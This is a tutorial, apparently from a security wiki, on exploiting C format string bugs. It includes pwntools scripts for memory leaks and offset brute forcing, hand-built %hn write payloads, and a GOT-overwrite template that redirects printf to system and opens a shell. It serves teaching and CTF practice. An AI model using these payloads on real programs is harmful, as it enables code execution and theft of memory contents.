Format Strings

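Basic Information

In C, printf is a function used to print a string. The first parameter it expects is the raw text containing the formatters. The following parameters are the values that replace those formatters in the raw text.

Other vulnerable functions include **sprintf()** and **fprintf()**.

The vulnerability appears when attacker-controlled text is used as the first argument to this function. By abusing printf's format string features, the attacker can craft input that reads and writes any data at any readable or writable address, and can thereby execute arbitrary code.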

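Formatters:

%08x -> 8 hex digits (one 4-byte value, zero-padded)
%d -> Signed integer
%u -> Unsigned integer
%s -> String
%p -> Pointer
%n -> Stores the number of bytes written so far at the address given by the argument
%hn -> Like %n, but stores 2 bytes instead of 4
%<n>$x -> Direct parameter access, e.g. ("%3$d", var1, var2, var3) -> accesses var3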
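
As a quick sanity check of the basic conversions, Python's `%` operator accepts the same `%x`, `%d`, and `%s` syntax. This is only an analogy: Python implements neither `%n` nor the `%<n>$` positional form, so the snippet illustrates output formatting, not the vulnerability itself.

```python
# Python's % operator mirrors the basic printf conversions
# (it has no %n and no %<n>$ positional arguments).
value = 1205

padded_hex = "%08x" % value   # zero-padded to 8 hex digits
plain_hex = "%x" % value      # no padding
decimal = "%d" % value        # signed decimal
text = "%s" % "AAAA"          # string

print(padded_hex, plain_hex, decimal, text)  # 000004b5 4b5 1205 AAAA
```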

Examples:

Vulnerable example:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

Normal use:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

With missing arguments:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

Vulnerable fprintf:

#include <stdio.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        return 1;  // No user input supplied.
    }
    char *user_input = argv[1];
    FILE *output_file = fopen("output.txt", "w");
    if (output_file == NULL) {
        return 1;  // Could not open the output file.
    }
    fprintf(output_file, user_input);  // The user input can include formatters!
    fclose(output_file);
    return 0;
}

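Accessing Pointers

The format %<n>$x, where n is a number, tells printf to select the n-th parameter (from the stack). So if you want to read the 4th parameter from the stack using printf, you could do:

printf("%x %x %x %x")

and you would read the first through the fourth parameters.

Or you could do:

printf("%4$x")

and read the fourth one directly.

Note that the attacker controls the printf format parameter, which means his input is on the stack when printf is called. He can therefore place specific memory addresses on the stack.

An attacker controlling this input can add arbitrary addresses to the stack and make printf access them. The next section explains how to exploit this behaviour.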
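
Direct parameter access makes it easy to dump several stack slots in one request. The sketch below only builds the format string; `build_leak_payload` and its arguments are hypothetical names introduced for illustration, and sending the result to a target is left out.

```python
def build_leak_payload(first, count, conv="p", sep="."):
    """Return a format string that dumps `count` consecutive parameters."""
    if first < 1:
        raise ValueError("printf parameter indexes start at 1")
    # One %<n>$<conv> specifier per parameter, joined by a visible separator
    # so the individual values are easy to split apart in the output.
    specs = [f"%{i}${conv}" for i in range(first, first + count)]
    return sep.join(specs).encode()


payload = build_leak_payload(1, 4)
print(payload)  # b'%1$p.%2$p.%3$p.%4$p'
```

Using `%p` rather than `%x` prints a full pointer-sized value on both 32-bit and 64-bit targets.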

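Arbitrary Read

The formatter **%n$s** makes printf take the **address stored at position n** and print what it points to **as a string** (printing until a 0x00 byte is found). So if the base address of the binary is **0x8048000**, and we know that the user input starts at the 4th position on the stack, the beginning of the binary can be printed with: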

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

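Note that you cannot put the address 0x8048000 at the beginning of the input: the address contains a 0x00 byte, and the format string would be cut off at that byte before any formatter is processed.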
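
The layout used above (format specifier first, padding, then the address) can be generated for other addresses and offsets. This is a minimal sketch using only `struct`; `arbitrary_read_payload`, `fmt_words`, and `word_size` are hypothetical names, and it assumes the input starts exactly on a stack-slot boundary.

```python
import struct


def arbitrary_read_payload(addr, input_offset, fmt_words=2, word_size=4):
    """Build '%<n>$s' + padding + packed address for an arbitrary read."""
    # The format part occupies `fmt_words` stack slots, so the address
    # ends up in parameter number input_offset + fmt_words.
    param = input_offset + fmt_words
    fmt = f"%{param}$s".encode()
    room = fmt_words * word_size
    if len(fmt) > room:
        raise ValueError("format part does not fit; increase fmt_words")
    pack_code = "<I" if word_size == 4 else "<Q"
    # The address goes last so that its 0x00 bytes cannot cut the format short.
    return fmt.ljust(room, b"x") + struct.pack(pack_code, addr)


payload = arbitrary_read_payload(0x8048000, input_offset=4)
print(payload)  # b'%6$sxxxx\x00\x80\x04\x08'
```

With the default arguments this reproduces the 32-bit payload from the example: the little-endian address begins with the 0x00 byte, which is why it cannot come first.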

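Finding the Offset

To find the offset of your input, send 4 or 8 bytes (for example AAAA, 0x41414141) followed by **%1$x**, and **increase** the parameter number until the A's come back.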

Brute Force printf offset

```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over candidate offsets (printf positional parameters start at 1)
for i in range(1, 10):
    # Construct a payload that includes the current integer as offset
    payload = f"AAAA%{i}$x".encode()

    # Start a new process of the "chall" binary
    p = process("./chall")

    # Send the payload to the process
    p.sendline(payload)

    # Read and store the output of the process
    output = p.clean()

    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
    if b"41414141" in output:
        # If the string is found, log the success message and break out of the loop
        log.success(f"User input is at offset : {i}")
        break

    # Close the process
    p.close()
```

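### How useful

Arbitrary reads can be useful to:

- **Dump** the **binary** from memory
- **Access specific parts of memory where sensitive information is stored** (such as canaries, encryption keys, or custom passwords, as in this [CTF challenge](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))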

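## **Arbitrary Write**

The formatter **`%<num>$n`** **writes** the **number of bytes written so far** to the **address** held in the \<num> parameter on the stack. If an attacker can make printf output as many characters as he wants, he can make **`%<num>$n`** write an arbitrary number to an arbitrary address.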

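Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input. Instead, the formatter **`%.<num-write>x%<num>$n`** can be used to write the number **`<num-write>`** (plus any characters already printed) to the **address pointed to by the `num` position**.
```bash
AAAA%.6000d%4\$n -> Writes 6004 to the address indicated by the 4th parameter
AAAA.%500\$08x -> Parameter at offset 500
```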
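
The arithmetic behind the first line is simply "characters already printed plus the precision". A minimal sketch of the inverse calculation follows; `write_count_payload` is a hypothetical helper, and it uses `%x` instead of `%d` so that a negative stack value cannot add an extra `-` character to the count.

```python
def write_count_payload(target, param, prefix=b"AAAA"):
    """Build prefix + %.<pad>x + %<param>$n so that %n stores `target`."""
    pad = target - len(prefix)
    # %.<pad>x prints at least <pad> digits. A 32-bit value needs at most
    # 8 hex digits, so pad >= 8 guarantees exactly <pad> characters.
    if pad < 8:
        raise ValueError("target too small for this simple sketch")
    return prefix + f"%.{pad}x%{param}$n".encode()


payload = write_count_payload(6004, 4)
print(payload)  # b'AAAA%.6000x%4$n'
```

Writing 9999 with the same 4-byte prefix needs a precision of 9995, not 9999 literal characters in the input.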

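However, note that to write an address such as `0x08049724` (which is a HUGE number to write at once), **`%hn`** is normally used instead of `%n`. This writes **only 2 bytes**. The operation is therefore done twice: once for the highest 2 bytes of the address and once for the lowest 2 bytes.

This vulnerability therefore allows **writing anything to any address (arbitrary write)**.

In this example, the goal is to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later, although other arbitrary-write-to-exec techniques could be abused as well.

We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**. As mentioned, writing the address usually takes 2 steps: first you write 2 bytes of the address, then the other 2. To do so, **`%hn`** is used.

HOB refers to the 2 higher bytes of the address
LOB refers to the 2 lower bytes of the address

Then, because of how format strings work (the printed-character count can only grow), you need to **write first the smaller** of \[HOB, LOB] and then the other one.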

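If HOB < LOB [address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn

If HOB > LOB [address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn

Layout of the example below (HOB < LOB): [HOB address] [LOB address] [HOB_shellcode-8] [parameter number of the HOB address] [LOB_shellcode-HOB_shellcode] [parameter number of the LOB address]

python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08" + b"\x24\x97\x04\x08" + b"%.49143x" + b"%4$hn" + b"%.15408x" + b"%5$hn" + b"\n")'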
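
The two formulas can be folded into one routine that sorts the halves before emitting them. This is a sketch under the same assumptions as the one-liner above (32-bit target, the two addresses are the first 8 bytes printed, and they sit at parameters `offset` and `offset+1`); `build_hn_payload` is a hypothetical name, not a pwntools function.

```python
import struct


def build_hn_payload(target_addr, value, offset):
    """Write the 32-bit `value` at `target_addr` using two %hn writes."""
    hob = (value >> 16) & 0xFFFF   # 2 higher bytes, stored at target_addr + 2
    lob = value & 0xFFFF           # 2 lower bytes, stored at target_addr
    # [address+2][address]: parameter `offset` points at the HOB slot,
    # parameter `offset + 1` points at the LOB slot.
    payload = struct.pack("<II", target_addr + 2, target_addr)
    written = len(payload)
    # Emit the smaller half first, because the printed count only grows.
    for half, param in sorted([(hob, offset), (lob, offset + 1)]):
        pad = (half - written) % 0x10000
        if 0 < pad < 8:
            # Too small for %.<pad>x to be exact; wrap around 16 bits instead.
            pad += 0x10000
        if pad:
            payload += f"%.{pad}x".encode()
            written += pad
        payload += f"%{param}$hn".encode()
    return payload


# Same bytes as the one-liner above: 0xbffffc2f written at 0x08049724.
payload = build_hn_payload(0x08049724, 0xBFFFFC2F, offset=4)
print(payload)
```

Like the formulas, this mixes non-positional `%x` padding with positional `%hn` writes, which works with common libc implementations but is not guaranteed by the C standard. In practice the pwntools `fmtstr_payload` helper shown in the next section handles these details.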

Pwntools Template

You can find a template to prepare an exploit for this kind of vulnerability in:

Alternatively, here is a basic example:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')

p.interactive()

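Format Strings to BOF

It is possible to abuse the write primitive of a format string vulnerability to write to addresses on the stack and so exploit a buffer-overflow type of vulnerability.

Other Examples & References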

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string used to overwrite the address of fflush with the win function (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
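32 bit, relro, no canary, nx, no pie, format string used to write an address inside main into .fini_array (so the flow loops back one more time) and to write the address of system into the GOT entry for strlen. When the flow returns to main, strlen is called with user input and, now pointing to system, executes the passed commands.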